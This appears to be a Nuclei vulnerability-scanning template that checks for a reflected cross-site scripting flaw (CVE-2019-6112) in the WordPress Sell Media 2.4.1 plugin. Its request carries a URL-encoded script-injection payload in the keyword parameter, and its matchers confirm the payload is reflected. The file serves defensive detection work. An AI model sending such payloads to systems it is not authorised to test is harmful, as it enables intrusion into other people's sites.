nuclei-templates/cves/2019/CVE-2019-6112.yaml

36 lines
1.3 KiB
YAML

id: CVE-2019-6112
info:
name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
reference:
- https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
- https://nvd.nist.gov/vuln/detail/CVE-2019-6112
- https://metamorfosec.com/Files/Advisories/METS-2020-001-A_XSS_Vulnerability_in_Sell_Media_Plugin_v2.4.1_for_WordPress.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-6112
cwe-id: CWE-79
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
- "alert(1337)"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04